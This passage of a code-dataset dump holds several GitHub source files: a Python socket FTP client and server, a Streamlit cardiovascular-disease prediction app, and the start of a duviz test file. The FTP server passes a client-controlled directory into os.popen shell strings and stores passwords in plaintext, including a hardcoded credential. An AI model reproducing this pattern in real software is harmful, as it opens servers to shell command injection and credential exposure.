"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\n# path=\"/root/ftpserver/venv/bin/python\"\n# list=path.split(\"/\")\n# list.remove(list[len(list)-1])\n# print(\"/\".join(list))\nimport sys\ndef show_progress(total, finished, percent):\n progress_mark = \"=\" * int(percent / 2)\n print(\"[%s/%s]%s>%s%s\\r\" % (total, finished, progress_mark, percent,\"%\"))\n sys.stdout.flush()\n if percent == 100:\n print ('\\n')\n\n\ntatal=10000000\nfinished=0\npercent=0\nwhile not finished == tatal:\n finished +=1\n cur_percent=int(float(finished)/tatal *100)\n if cur_percent > percent:\n percent = cur_percent\n show_progress(tatal,finished,percent)\nelse:\n print(\"done\")\n\n"
},
{
"alpha_fraction": 0.4559648334980011,
"alphanum_fraction": 0.4705168902873993,
"avg_line_length": 31.48768424987793,
"blob_id": "dfb1a754ab7dfd830e59e0ae7c4f3a0eaeea3db8",
"content_id": "3d0a459ccc200be104223a26c434031b7a6dd402",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6861,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 203,
"path": "/ftp_client/ftp_client.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport socket\nimport os\nimport json\nimport hashlib\nimport sys\n\nclass FtpClient(object):\n def __init__(self):\n '''客户端实例'''\n\n self.client = socket.socket()\n def help(self):\n ''' 查看帮助'''\n\n msg = '''\n ls\n pwd\n cd ../..\n get filename\n put filename\n '''\n def connect(self,ip,port):\n '''建立socket连接'''\n\n self.client.connect((ip,port))\n\n def authenticat(self):\n '''登录功能'''\n username=input(\"please input your username:\")\n password=input(\"please input your password:\")\n msg_dic={\n \"username\":username,\n \"password\":password\n }\n self.client.send(json.dumps(msg_dic).encode())\n def interactive(self):\n '''交互功能'''\n\n self.authenticat() # 登录\n server_response=self.client.recv(1024).decode()\n if server_response == \"login success\":\n while True:\n cmd = input(\">>:\")\n if len(cmd) == 0:continue\n cmd_str = cmd.split()[0] # split 后是一个列表形式\n if cmd==\"cd ..\":\n func = getattr(self, \"cmd_cd_back\")\n func(cmd)\n else:\n\n if hasattr(self,\"cmd_%s\"%cmd_str): # 反射\n\n func =getattr(self,\"cmd_%s\"%cmd_str)\n func(cmd)\n else:\n self.help()\n\n\n else:\n print(server_response)\n def cmd_put(self,*args):\n '''上传文件到服务端功能'''\n\n\n cmd_split = args[0].split() # 获取输入的命令转换为列表形式\n if len(cmd_split) >1:\n filename = cmd_split[1]\n if os.path.isfile(filename): # 判断文件是否存在\n filesize = os.stat(filename).st_size # 文件大小\n msg_dic ={\n \"action\":\"put\",\n \"filename\":filename,\n \"size\":filesize,\n \"overridden\":True\n }\n self.client.send(json.dumps(msg_dic).encode()) # 字典转json 再转byte\n # 防止黏包,等服务器确认\n server_response = self.client.recv(1024)\n # 可以写标准请求码\n # .....\n f = open(filename,\"rb\")\n m = hashlib.md5()\n persent=0\n for line in f:\n m.update(line)\n self.client.send(line)\n send_size=len(line)\n cur_percent = int(float(send_size) / filesize * 100)\n if cur_percent > persent:\n persent = cur_percent\n self.show_progress(filesize, send_size, persent)\n\n else: # for/else 当for执行完毕走else,如果for break了就不走else\n print(\"file put success...\")\n file_md5=m.hexdigest()\n # print(file_md5)\n self.client.send(file_md5.encode())\n f.close()\n else:\n print(filename,\"is not exist\")\n else:\n print(\"put need 1 argument at least such as filename\")\n def cmd_get(self,*args):\n '''下载服务端文件功能'''\n\n\n cmd_split = args[0].split()\n if len(cmd_split)>1:\n filename = cmd_split[1]\n msg_dic={\n \"action\":\"get\",\n \"filename\":filename,\n \"overridden\":True\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response=self.client.recv(1024)\n if server_response != b\"FileNotFound\":\n if os.path.isfile(filename):\n f = open(filename + \".new\", \"wb\")\n else:\n f = open(filename, \"wb\")\n m=hashlib.md5()\n self.client.send(b\"200 OK\") # 客户端发送可以传输信号给服务端\n filesize=int(server_response.decode())\n reseived_size=0\n persent=0\n while reseived_size<filesize:\n if filesize-reseived_size>1024:\n size=1024\n else:\n size=filesize-reseived_size\n data=self.client.recv(size)\n f.write(data)\n m.update(data)\n reseived_size+=len(data)\n cur_percent = int(float(reseived_size)/filesize *100)\n if cur_percent > persent:\n persent=cur_percent\n self.show_progress(filesize,reseived_size,persent)\n\n else:\n print(\"file [%s] has uloaded...\"%filename)\n f.close()\n file_md5=m.hexdigest()\n server_file_md5=self.client.recv(1024).decode()\n if file_md5 == server_file_md5:\n print(\"server file's md5 is the same as server file's md5:uploading success!!\")\n else:\n print(\"md5 is different with client file's md5:uploading 
failed..\")\n else:\n print(\"file [%s] is not exist in server\"%filename)\n else:\n print(\"get need 1 argument at least such as filename\")\n\n def cmd_ls(self,*args):\n msg_dic={\n \"action\":\"ls\"\n\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response=self.client.recv(1024).decode()\n print(server_response)\n def cmd_pwd(self,*args):\n msg_dic={\n \"action\":\"pwd\"\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response=self.client.recv(1024).decode()\n print(server_response)\n\n def cmd_cd(self,*args):\n cmd_split=args[0].split()\n cd_dir=cmd_split[1]\n msg_dic={\n \"action\":\"cd\",\n \"cd_dir\":cd_dir\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response = self.client.recv(1024).decode()\n print(server_response)\n def cmd_cd_back(self,*args):\n msg_dic={\n \"action\":\"cd_back\"\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response = self.client.recv(1024).decode()\n print(server_response)\n\n def show_progress(self,total, finished, percent):\n '''进度条'''\n progress_mark = \"=\" * int(percent / 2)\n print(\"[%s/%s]%s>%s%s\\r\" % (total, finished, progress_mark, percent, \"%\"))\n sys.stdout.flush()\n if percent == 100:\n print('\\n')\n\nftp =FtpClient()\nftp.connect(\"172.16.95.131\",9999)\nftp.interactive()\n\n\n"
},
{
"alpha_fraction": 0.5052686333656311,
"alphanum_fraction": 0.5164967775344849,
"avg_line_length": 30.467391967773438,
"blob_id": "43e6b3c1f3876b26bcf829ea0dc6a364596022ff",
"content_id": "b59a71c4a76fa8e0ae04639c5751300832b615c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5973,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 184,
"path": "/ftp_server/core/main.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport socketserver\nimport json\nimport os\nimport hashlib\nfrom conf import setting\n\nclass MyTCPHandler(socketserver.BaseRequestHandler):\n\n def authenticat(self,*args):\n '''服务端登录验证'''\n user_dic =args[0]\n username =user_dic['username']\n password =user_dic['password']\n try:\n with open(setting.BASE_DIR+\"/data/%s.txt\"%username,\"r\") as f:\n data=json.loads(f.read())\n\n f.close()\n user_dir=data['user_dir']\n if data['username'] == username:\n if data['password'] == password: \n self.request.send(b\"login success\")\n return True,user_dir\n else:\n self.request.send(b\"error password\")\n print(\"username:%s login failed:error password\"%username)\n return False,None\n except FileNotFoundError as e:\n print(\"error username:\",username)\n self.request.send(b\"error username\")\n return False,None\n\n\n def ls(self,*args):\n ''' 查看当前目录下文件'''\n cmd_dic=args[0]\n user_dir=cmd_dic[\"user_dir\"]\n print(user_dir)\n msg = os.popen(\"ls \"+user_dir).read()\n self.request.send(msg.encode())\n return user_dir\n\n def pwd(self,*args):\n '''查看当前位置'''\n cmd_dic=args[0]\n user_dir=cmd_dic[\"user_dir\"]\n msg = os.popen(\"cd \"+user_dir+\";pwd\").read()\n self.request.send(msg.encode())\n print(user_dir)\n return user_dir\n\n def cd(self,*args):\n '''cd'''\n cmd_dic=args[0]\n user_dir=cmd_dic[\"user_dir\"]\n cd_dir=cmd_dic[\"cd_dir\"]\n user_dir=user_dir+\"/\"+cd_dir\n msg=\"the current dir is %s\"%user_dir\n print(user_dir)\n self.request.send(msg.encode())\n return user_dir\n\n def cd_back(self,*args):\n '''cd ..'''\n cmd_dic=args[0]\n username=args[1]\n user_dir=cmd_dic[\"user_dir\"]\n if user_dir == \"/root/ftpserver/ftp_server/%s\"%username:\n msg=\"this is already in home\"\n print(msg)\n self.request.send(msg.encode())\n else:\n list=user_dir.split(\"/\")\n list.remove(list[len(list)-1])\n user_dir=\"/\".join(list)\n msg=\"the current dir is %s\"%user_dir\n print(user_dir)\n self.request.send(msg.encode())\n return user_dir\n\n\n\n\n def get(self,*args):\n '''发送文件到客户端'''\n cmd_dic = args[0]\n filename = cmd_dic[\"filename\"]\n user_dir = cmd_dic[\"user_dir\"]\n if os.path.isfile(user_dir+\"/\"+filename):\n filesize=os.stat(user_dir+\"/\"+filename).st_size\n self.request.send(str(filesize).encode())\n client_response=self.request.recv(1024) # 服务端收到客户端准备传输的信号\n f=open(user_dir+\"/\"+filename,\"rb\")\n m=hashlib.md5()\n for line in f:\n self.request.send(line)\n m.update(line)\n else:\n print(\"file put success...\")\n f.close()\n file_md5=m.hexdigest()\n self.request.send(file_md5.encode())\n\n\n else:\n message=\"filename:[%s] is not exist..\"%filename\n print(message)\n self.request.send(b\"FileNotFound\")\n\n return user_dir\n\n\n def put(self,*args):\n ''' 接受客户端文件'''\n cmd_dic = args[0]\n filename = cmd_dic[\"filename\"]\n filesize = cmd_dic[\"size\"]\n user_dir = cmd_dic[\"user_dir\"]\n print(user_dir+\"/\"+filename)\n if os.path.isfile(user_dir+\"/\"+filename):# 文件存在时\n f = open(user_dir+\"/\"+filename+\".new\",\"wb\")\n else: # 文件不存在时\n f = open(user_dir+\"/\"+filename,\"wb\")\n self.request.send(b\"200 ok\")\n received_size=0\n m=hashlib.md5()\n while received_size < filesize:\n if filesize-received_size >1024: # 解决黏包\n size=1024\n else:\n size=filesize-received_size\n data = self.request.recv(size)\n m.update(data)\n f.write(data)\n received_size+=len(data) # 因为data本来就是byte len(data)就可以直接获取data大小(字节数)\n else:\n print(\"filename: [%s] has uploaded...\"%filename)\n f.close()\n file_md5 = m.hexdigest()\n 
file_client_md5 = self.request.recv(1024).decode()\n\n if file_md5 == file_client_md5:\n print(\"server file's md5 is the same as client file's md5:uploading success!!\")\n else:\n print(\"md5 is different with client file's md5:uploading failed...\")\n return user_dir\n\n\n\n\n def handle(self):\n '''handler处理类'''\n\n\n self.user_dic=self.request.recv(1024).strip().decode()\n try:\n user_data=json.loads(self.user_dic)\n except Exception as e:\n pass\n login_signal,user_dir=self.authenticat(user_data)\n if login_signal:\n while True:\n self.data=self.request.recv(1024).strip()\n print(\"{} wrote:\".format(self.client_address[0]))\n cmd_dic = json.loads(self.data.decode())\n cmd_dic['user_dir']=user_dir\n action = cmd_dic[\"action\"]\n if hasattr(self,action):\n if action !=\"cd_back\":\n func = getattr(self,action)\n user_dir=func(cmd_dic)\n else:\n func =getattr(self,action)\n user_dir=func(cmd_dic,user_data['username'])\n\n\ndef run():\n HOST,PORT=\"172.16.95.131\",9999\n server = socketserver.ThreadingTCPServer((HOST,PORT),MyTCPHandler)\n server.serve_forever()"
},
{
"alpha_fraction": 0.6969696879386902,
"alphanum_fraction": 0.7045454382896423,
"avg_line_length": 17.85714340209961,
"blob_id": "b9165f4a210bb5d0640e479e79704f5c328a2908",
"content_id": "20d331157f92e08edc1baf3359710c94b6bbaeb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 7,
"path": "/ftp_server/conf/setting.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport os\n\nBASE_DIR=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n"
},
{
"alpha_fraction": 0.6066176295280457,
"alphanum_fraction": 0.6433823704719543,
"avg_line_length": 17.066667556762695,
"blob_id": "b436619facd3c4812524e0a547b86e830bfe5e8b",
"content_id": "c51b64ea27d446b2556f41ecce4483c1cc375a89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 15,
"path": "/ftp_server/data/create_data.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport json\nfrom conf import setting\n\nuser_data={\n \"username\":\"yhr123\",\n \"password\":\"960314\",\n \"user_dir\":setting.BASE_DIR+\"/yhr123\"\n}\n\nwith open(\"yhr123.txt\",\"w+\") as f:\n f.write(json.dumps(user_data))\n\n"
}
] | 7 |
BcanTayiz/CardioVascularDisease | https://github.com/BcanTayiz/CardioVascularDisease | 581213f6f878966e3fc0efa61a8bc3080be7c4ca | 1f934402758f43c089ada31f693e2b444c7d03b9 | 7ceb414d1984b2a5a2302b160a9205d30f4cbffb | refs/heads/main | 2023-01-13T05:32:11.086317 | 2020-11-22T09:00:44 | 2020-11-22T09:00:44 | 314,996,699 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6517453193664551,
"alphanum_fraction": 0.6662307381629944,
"avg_line_length": 37.07480239868164,
"blob_id": "ac3fda0c58049ad13e5637530229d9151c5447ff",
"content_id": "43967e28da55ff5b6f1280494c09d0981b8775b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9941,
"license_type": "permissive",
"max_line_length": 182,
"num_lines": 254,
"path": "/app.py",
"repo_name": "BcanTayiz/CardioVascularDisease",
"src_encoding": "UTF-8",
"text": "import streamlit as st \r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport seaborn as sns \r\nfrom matplotlib import pyplot\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.inspection import permutation_importance\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom xgboost import XGBClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.metrics import r2_score\r\nimport datetime\r\nimport random\r\nfrom sklearn import preprocessing\r\nfrom sklearn.metrics import balanced_accuracy_score\r\nimport streamlit_theme as stt\r\nimport streamlit.components.v1 as components\r\nfrom datetime import date\r\n\r\n\r\nrandom.seed(10)\r\nstt.set_theme({'primary': '#1b3388'})\r\nst.title(\"Cardiovascular Disease Alert\")\r\n\r\nst.write(\"Created by Barış Can Tayiz\")\r\n\r\ncomponents.html(\"\"\"\r\n<div style=\"background-color:black;height:10px;border-radius:10px;margin-bottom:0px;\">\r\n</div><hr>\"\"\")\r\n\r\nst.header(\"Variables\")\r\nst.write(\r\n\"\"\"* Age | Objective Feature | age | int (days) \\n\r\n* Height | Objective Feature | height | int (cm) | \\n\r\n* Weight | Objective Feature | weight | float (kg) | \\n\r\n* Gender | Objective Feature | gender | categorical code | \\n\r\n* Systolic blood pressure | Examination Feature | ap_hi | int | \\n\r\n* Diastolic blood pressure | Examination Feature | ap_lo | int | \\n\r\n* Cholesterol | Examination Feature | cholesterol | 1: normal, 2: above normal, 3: well above normal | \\n\r\n* Glucose | Examination Feature | gluc | 1: normal, 2: above normal, 3: well above normal | \\n\r\n* Smoking | Subjective Feature | smoke | binary |\\n\r\n* Alcohol intake | Subjective Feature | alco | binary | \\n\r\n* Physical activity | Subjective Feature | active | binary | \\n\r\n* Presence or absence of cardiovascular disease | Target Variable | cardio | binary |\"\"\"\r\n)\r\n\r\ncomponents.html(\"\"\"\r\n<div style=\"background-color:black;height:10px;border-radius:10px;margin-bottom:0px;\">\r\n</div><hr>\"\"\")\r\n\r\ndata = pd.read_csv('cardio_train.csv',sep=\";\")\r\n\r\ndata = data.drop('id',axis=1)\r\n\r\nst.write(data.describe())\r\n\r\ncomponents.html(\"\"\"\r\n<div style=\"background-color:black;height:10px;border-radius:10px;margin-bottom:0px;\">\r\n</div><hr>\"\"\")\r\n\r\nclassifier_types = (\"Random Forests\",\"XGBClassifier\",\"Neural Net\")\r\n\r\nclassifier_name = st.sidebar.selectbox(\"Select Regressor\",classifier_types)\r\n\r\nst.header(\"Correlation Values of parameters\")\r\n\r\ncm = sns.light_palette(\"coral\", as_cmap=True) \r\n\r\nst.write(data.corr().style.background_gradient(cmap=cm).set_precision(2))\r\n\r\nX = data.drop('cardio',axis=1)\r\ny = data['cardio']\r\n\r\nx = X #returns a numpy array\r\nmin_max_scaler = preprocessing.MinMaxScaler()\r\nx_scaled = min_max_scaler.fit_transform(x)\r\nX = pd.DataFrame(x_scaled)\r\n\r\n\r\nX = X.apply(pd.to_numeric)\r\ny = y.apply(pd.to_numeric)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef parameter_ui(classifier_name):\r\n params = dict()\r\n if classifier_name == classifier_types[0]:\r\n n_estimators = st.sidebar.slider(\"n_estimators\",11,99)\r\n criterion = st.sidebar.selectbox(\"criterion\",(\"gini\", \"entropy\"))\r\n max_depth = st.sidebar.slider(\"max_depth\",1,100)\r\n 
min_samples_split = st.sidebar.slider(\"min_samples_split\",2,100)\r\n        min_samples_leaf = st.sidebar.slider(\"min_samples_leaf\",1,100)\r\n        max_features = st.sidebar.selectbox(\"max_features\",(\"auto\", \"sqrt\", \"log2\"))\r\n        bootstrap = st.sidebar.selectbox(\"bootstrap\",(\"True\",\"False\"))\r\n        oob_score = st.sidebar.selectbox(\"oob_score\",(\"True\",\"False\"))\r\n        class_weight = st.sidebar.selectbox(\"class_weight\",(\"balanced\",\"balanced_subsample\"))\r\n\r\n        params[\"n_estimators\"] = n_estimators\r\n        params[\"criterion\"] = criterion\r\n        params[\"max_depth\"] = max_depth\r\n        params[\"min_samples_split\"] = min_samples_split\r\n        params[\"min_samples_leaf\"] = min_samples_leaf\r\n        params[\"max_features\"] = max_features\r\n        params[\"bootstrap\"] = bootstrap\r\n        params[\"oob_score\"] = oob_score\r\n        params[\"class_weight\"] = class_weight\r\n\r\n    elif classifier_name == classifier_types[1]:\r\n        booster = st.sidebar.selectbox(\"booster\",(\"gbtree\", \"gblinear\",\"dart\"))\r\n        verbosity = st.sidebar.selectbox(\"verbosity\",(0,1,2,3))\r\n        nthread = st.sidebar.slider(\"nthread \",1,100)\r\n        eta = st.sidebar.slider(\"eta \",0,100,1)\r\n        gamma = st.sidebar.slider(\"gamma \",0,100)\r\n        max_depth = st.sidebar.slider(\"max_depth \",1,100)\r\n        min_child_weight = st.sidebar.slider(\"min_child_weight \",0,100)\r\n        max_delta_step = st.sidebar.slider(\"max_delta_step \",0,100)\r\n\r\n        eta = eta / 100\r\n\r\n        params[\"booster\"] = booster\r\n        params[\"verbosity\"] = verbosity\r\n        params[\"nthread\"] = nthread\r\n        params[\"eta\"] = eta\r\n        params[\"gamma\"] = gamma\r\n        params[\"max_depth\"] = max_depth\r\n        params[\"min_child_weight\"] = min_child_weight\r\n        params[\"max_delta_step\"] = max_delta_step\r\n\r\n    elif classifier_name == classifier_types[2]:\r\n        hidden_layer_sizes = st.sidebar.slider(\"hidden_layer_sizes\",1,50)\r\n        activation = st.sidebar.selectbox(\"activation\",(\"identity\", \"logistic\",\"tanh\",\"relu\"))\r\n        solver = st.sidebar.selectbox(\"solver\",(\"lbfgs\", \"sgd\", \"adam\"))\r\n        alpha = st.sidebar.slider(\"alpha\",0,100,1)\r\n        batch_size = st.sidebar.slider(\"batch_size\",1,100)\r\n        learning_rate = st.sidebar.selectbox(\"learning_rate\",(\"constant\", \"invscaling\", \"adaptive\"))\r\n        max_iter = st.sidebar.slider(\"max_iter\",1,100)\r\n        shuffle = st.sidebar.selectbox(\"shuffle\",(\"True\", \"False\"))\r\n\r\n        alpha = alpha / 100\r\n\r\n        params[\"hidden_layer_sizes\"] = hidden_layer_sizes\r\n        params[\"activation\"] = activation\r\n        params[\"solver\"] = solver\r\n        params[\"alpha\"] = alpha\r\n        params[\"batch_size\"] = batch_size\r\n        params[\"learning_rate\"] = learning_rate\r\n        params[\"max_iter\"] = max_iter\r\n\r\n    return params\r\n\r\n\r\nparams = parameter_ui(classifier_name)\r\n\r\ndef get_classifier(classifier_name,params):\r\n    if classifier_name == classifier_types[0]:\r\n        clf = RandomForestClassifier(n_estimators=params[\"n_estimators\"], criterion=params[\"criterion\"],max_depth=params[\"max_depth\"]\r\n        ,min_samples_split = params[\"min_samples_split\"],min_samples_leaf = params[\"min_samples_leaf\"],max_features = params[\"max_features\"],\r\n        oob_score = (params['oob_score'] == \"True\"),class_weight = params['class_weight'])\r\n    elif classifier_name == classifier_types[1]:\r\n        clf = XGBClassifier(booster=params[\"booster\"], verbosity=params[\"verbosity\"],nthread=params[\"nthread\"],eta=params[\"eta\"],gamma=params[\"gamma\"],max_depth=params[\"max_depth\"],\r\n        min_child_weight = params[\"min_child_weight\"],max_delta_step = params[\"max_delta_step\"])\r\n    elif classifier_name == classifier_types[2]:\r\n        clf = MLPClassifier(hidden_layer_sizes=params[\"hidden_layer_sizes\"],activation=params[\"activation\"],solver=params[\"solver\"],\r\n        alpha=params[\"alpha\"],batch_size=params[\"batch_size\"],learning_rate=params[\"learning_rate\"],max_iter = params[\"max_iter\"])\r\n\r\n    return clf\r\n\r\nclf = get_classifier(classifier_name,params)\r\n\r\nst.write(clf)\r\n\r\n# Classifier\r\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size = 0.1,random_state = 42)\r\n\r\nclf.fit(X_train,y_train)\r\ny_pred = clf.predict(X_test)\r\n\r\n# MODEL IMPORTANCE\r\ntry:\r\n    st.set_option('deprecation.showPyplotGlobalUse', False)\r\n    st.header(\"Feature Importance Figure\")\r\n    importances = clf.feature_importances_\r\n    # summarize feature importance\r\n    for i,v in enumerate(importances):\r\n        print('Feature: %0d, Score: %.5f' % (i,v))\r\n    # plot feature importance\r\n    from matplotlib.pyplot import figure\r\n    figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')\r\n    pyplot.bar([data.iloc[:,i].name for i in range(len(importances))], importances)\r\n\r\n    st.pyplot()\r\nexcept Exception:\r\n    # models without feature_importances_ (e.g. the neural net) skip this section\r\n    pass\r\n\r\n\r\nst.header(\"Balanced Accuracy Score\")\r\nst.write(\"The balanced accuracy score shows how well the predicted values match the real values. It should be close to 1 for the best training results\")\r\nst.write(balanced_accuracy_score(y_test, y_pred))\r\n\r\n\r\nst.header(\"Get your Cardiovascular Condition\")\r\n\r\nbirthDay = st.text_input(\"Enter your Birthday as yyyy-mm-dd: \")\r\ngender = st.text_input(\"Enter your gender, 1 women; 2 men: \")\r\nheight = st.text_input(\"Enter your height, as cm: \")\r\nweight = st.text_input(\"Enter your weight, as kg: \")\r\nap_hi = st.text_input(\"Enter your Systolic blood pressure ap_hi: \")\r\nap_lo = st.text_input(\"Enter your Diastolic blood pressure ap_lo: \")\r\nchol = st.text_input(\"Enter your Cholesterol level, 1: normal; 2: above normal; 3: well above normal : \")\r\ngluc = st.text_input(\"Enter your Glucose level, 1: normal; 2: above normal; 3: well above normal : \")\r\nsmoke = st.text_input(\"Enter your smoke, yes 1; no 0: \")\r\nalco = st.text_input(\"Enter your alco, yes 1; no 0: \")\r\nactive = st.text_input(\"Enter your physical activity, yes 1; no 0: \")\r\n\r\n\r\ninputs = [birthDay,gender,height,weight,ap_hi,ap_lo,chol,gluc,smoke,alco,active]\r\n\r\n# Only build the feature vector and predict once every field has been filled in;\r\n# otherwise the date/int conversions below would fail on the empty defaults.\r\nif all(inputs):\r\n\r\n    today = pd.to_datetime(date.today())\r\n    birthDay = pd.to_datetime(birthDay)\r\n    days = int((today-birthDay).days)\r\n\r\n    entry_prediction = [int(days),int(gender),int(height),int(weight),int(ap_hi),\r\n                        int(ap_lo),int(chol),int(gluc),int(smoke),int(alco),int(active)]\r\n\r\n    df = pd.DataFrame(columns = x.columns)\r\n    df = df.append(x)\r\n    df.loc[x.shape[0]+1] = entry_prediction\r\n\r\n    min_max_scaler = preprocessing.MinMaxScaler()\r\n    df_scaled = min_max_scaler.fit_transform(df.tail(2))\r\n    entryPred_df = pd.DataFrame(df_scaled)\r\n\r\n    prediction = clf.predict_proba(entryPred_df.astype(float))\r\n    st.write(prediction)\r\n    st.header(\"Probable {0} {1}\".format(\"Cardiovascular Disease\",'%{:,.2f}'.format(prediction[1][1])))\r\n"
},
{
"alpha_fraction": 0.46621620655059814,
"alphanum_fraction": 0.662162184715271,
"avg_line_length": 16.5,
"blob_id": "d97de58a690e996ae0a53f32810b966727ff9de7",
"content_id": "139f12997ba9e92536af0dd54d4da224f512ea33",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 148,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "BcanTayiz/CardioVascularDisease",
"src_encoding": "UTF-8",
"text": "pandas==1.1.4\r\nxgboost==1.2.1\r\nstreamlit_theme==0.58.0\r\nmatplotlib==3.3.3\r\nseaborn==0.11.0\r\nnumpy==1.19.3\r\nstreamlit==0.71.0\r\nscikit_learn==0.23.2\r\n"
}
] | 2 |
soxofaan/duviz | https://github.com/soxofaan/duviz | 18e369e601fb234798189043b0f69e497b4af8bf | 288e3e1b0cc352a93e2ed58f405163fc9428bdfe | 2db386b0abdbdefd50ba8389be6fce112ef408e1 | refs/heads/main | 2023-04-28T06:27:06.512070 | 2023-04-17T20:32:07 | 2023-04-17T20:32:07 | 3,297,972 | 93 | 17 | MIT | 2012-01-29T15:59:42 | 2023-03-09T21:59:41 | 2023-04-15T10:25:36 | Python | [
{
"alpha_fraction": 0.3501076400279999,
"alphanum_fraction": 0.40581271052360535,
"avg_line_length": 28.609561920166016,
"blob_id": "8f160cd82cbca92f468e378c12c7835f4f7c085d",
"content_id": "6629fc7a4fe40e1c3f4414cf822e0bdacc1a3747",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22309,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 753,
"path": "/test_duviz.py",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\n\n# TODO: test actual CLI\n\nimport itertools\nimport tarfile\nimport textwrap\nimport zipfile\nfrom pathlib import Path\nfrom typing import List\n\nimport pytest\n\nfrom duviz import (\n TreeRenderer,\n SIZE_FORMATTER_COUNT,\n SIZE_FORMATTER_BYTES,\n SIZE_FORMATTER_BYTES_BINARY,\n path_split,\n SizeTree,\n AsciiDoubleLineBarRenderer,\n DuProcessor,\n InodeProcessor,\n get_progress_reporter,\n AsciiSingleLineBarRenderer,\n ColorDoubleLineBarRenderer,\n ColorSingleLineBarRenderer,\n Colorizer,\n ZipFileProcessor,\n TarFileProcessor,\n)\n\n\ndef test_bar_one():\n assert 'y' == TreeRenderer().bar('x', 1, small='y')\n\n\ndef test_bar_zero():\n assert '' == TreeRenderer().bar('x', 0)\n\n\ndef test_bar_basic():\n assert '[--abcd--]' == TreeRenderer().bar('abcd', 10)\n\n\ndef test_bar_left_and_right():\n assert '<<--abcd--**' == TreeRenderer().bar('abcd', 12, left='<<', right='**')\n\n\ndef test_bar_fill():\n assert '[++abcd++]' == TreeRenderer().bar('abcd', 10, fill='+')\n\n\ndef test_bar_unicode():\n assert '[++åßc∂++]' == TreeRenderer().bar('åßc∂', 10, fill='+')\n\n\ndef test_bar_unicode2():\n label = b'\\xc3\\xb8o\\xcc\\x82o\\xcc\\x88o\\xcc\\x81a\\xcc\\x8a'.decode('utf8')\n assert '[+øôöóå+]' == TreeRenderer().bar(label, 9, fill='+')\n\n\[email protected](\n \"expected\",\n [\n '',\n '|',\n '[]',\n '[f]',\n '[fo]',\n '[foo]',\n '[_foo]',\n '[_foo_]',\n '[_foo_-]',\n '[-_foo_-]',\n '[-_foo_--]',\n '[--_foo_--]',\n '[--_foo_---]',\n '[---_foo_---]',\n ]\n)\ndef test_bar_padding(expected):\n assert expected == TreeRenderer().bar('foo', width=len(expected), fill=\"-\", label_padding='_')\n\n\[email protected](\n \"expected\",\n [\n '',\n 'f',\n 'fo',\n 'foo',\n '_foo',\n '_foo_',\n '_foo_-',\n '-_foo_-',\n ]\n)\ndef test_bar_no_left_right(expected):\n assert expected == TreeRenderer().bar(\n 'foo', width=len(expected),\n left='', right='', small='*', fill=\"-\", label_padding='_',\n )\n\n\[email protected](\n \"expected\",\n [\n '',\n '=',\n '==',\n '===',\n '[[]]',\n '[[f]]',\n '[[fo]]',\n '[[foo]]',\n '[[_foo]]',\n '[[_foo_]]',\n '[[_foo_-]]',\n '[[-_foo_-]]',\n ]\n)\ndef test_bar_small(expected):\n assert expected == TreeRenderer().bar(\n 'foo', width=len(expected),\n left='[[', right=']]', small='=', fill=\"-\", label_padding='_',\n )\n\n\[email protected](\n \"expected\",\n [\n '',\n '#',\n '#=',\n '#=+',\n '#=+#',\n '#=+#=',\n '[<[]>]',\n '[<[f]>]',\n ]\n)\ndef test_bar_small_multiple(expected):\n assert expected == TreeRenderer().bar(\n 'f', width=len(expected),\n left='[<[', right=']>]', small='#=+', fill=\"-\", label_padding='_',\n )\n\n\nTREE123 = SizeTree(\"foo\", 123)\n\nTREE60 = SizeTree(\"foo\", 60, children={\n \"bar\": SizeTree(\"bar\", 40, children={\n \"xe\": SizeTree(\"xe\", 20),\n \"vo\": SizeTree(\"vo\", 10),\n }),\n \"baz\": SizeTree(\"baz\", 20, children={\n \"pu\": SizeTree(\"pu\", 